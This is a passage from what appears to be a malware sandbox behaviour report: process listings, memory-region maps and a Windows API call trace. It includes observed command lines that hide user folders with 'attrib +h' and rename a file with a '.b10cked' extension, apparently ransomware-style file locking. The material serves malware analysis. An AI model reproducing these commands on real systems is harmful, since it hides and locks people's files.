AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28407 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28408 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28409 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28410 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 28411 start_va = 0xf90000 end_va = 0xf96fff entry_point = 0xf90000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28412 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28413 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28414 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28415 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28416 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28417 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28418 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28419 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 28420 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28421 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 28422 start_va = 0x6de70000 end_va = 0x6de8cfff entry_point = 0x6de70000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28423 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28424 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28425 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28426 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28427 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28428 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28429 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28430 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28431 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28432 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28433 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28434 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 28435 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28436 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 630 os_tid = 0xe38 Process: id = "439" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "436" os_parent_pid = "0xa84" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28438 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28439 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28440 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28441 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 28442 start_va = 0x630000 end_va = 0x636fff entry_point = 0x630000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28443 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28444 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28445 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28446 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 28447 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28448 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28449 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28450 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28451 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 28452 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 28453 start_va = 0x6de80000 end_va = 0x6de9cfff entry_point = 0x6de80000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28454 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28455 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28456 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28457 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28458 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28459 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28460 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28461 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28462 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28463 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28464 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28465 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28466 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28467 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 631 os_tid = 0xe60 Process: id = "440" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0xe0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "436" os_parent_pid = "0xa84" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28468 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28469 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28470 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28471 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28472 start_va = 0xbf0000 end_va = 0xbf6fff entry_point = 0xbf0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28473 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28474 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28475 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28476 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 28477 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28478 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28479 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28480 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28481 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 28482 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 28483 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28484 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28485 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28486 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28487 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28488 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28489 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28490 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28491 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28492 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28493 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28494 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28495 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 28496 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28497 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 632 os_tid = 0xd7c Process: id = "441" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xe08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28523 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28524 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28525 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28526 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28527 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28528 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28529 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28530 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28531 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 28532 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28625 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28626 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28627 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28628 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 28629 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 28630 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28631 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28632 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28633 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28634 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28635 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28636 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28637 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28638 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28639 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 28640 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28641 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28642 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28643 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 28644 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28645 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 28646 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 28647 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 28648 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 28650 start_va = 0x1330000 end_va = 0x13effff entry_point = 0x1330000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 634 os_tid = 0x728 [0194.389] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efe1c | out: lpSystemTimeAsFileTime=0x1efe1c*(dwLowDateTime=0xa8be1820, dwHighDateTime=0x1d440a9)) [0194.389] GetCurrentProcessId () returned 0xe08 [0194.389] GetCurrentThreadId () returned 0x728 [0194.389] GetTickCount () returned 0x3731c [0194.389] QueryPerformanceCounter (in: lpPerformanceCount=0x1efe14 | out: lpPerformanceCount=0x1efe14*=25117799514) returned 1 [0194.390] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0194.390] __set_app_type (_Type=0x1) [0194.390] __p__fmode () returned 0x76b331f4 [0194.390] __p__commode () returned 0x76b331fc [0194.390] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0194.390] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0194.390] GetCurrentThreadId () returned 0x728 [0194.390] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x728) returned 0x38 [0194.390] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0194.390] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0194.390] SetThreadUILanguage (LangId=0x0) returned 0x409 [0194.393] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0194.393] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efdac | out: phkResult=0x1efdac*=0x0) returned 0x2 [0194.393] VirtualQuery (in: lpAddress=0x1efde3, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.393] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0194.393] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0194.393] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.393] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efd7c, dwLength=0x1c | out: lpBuffer=0x1efd7c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, 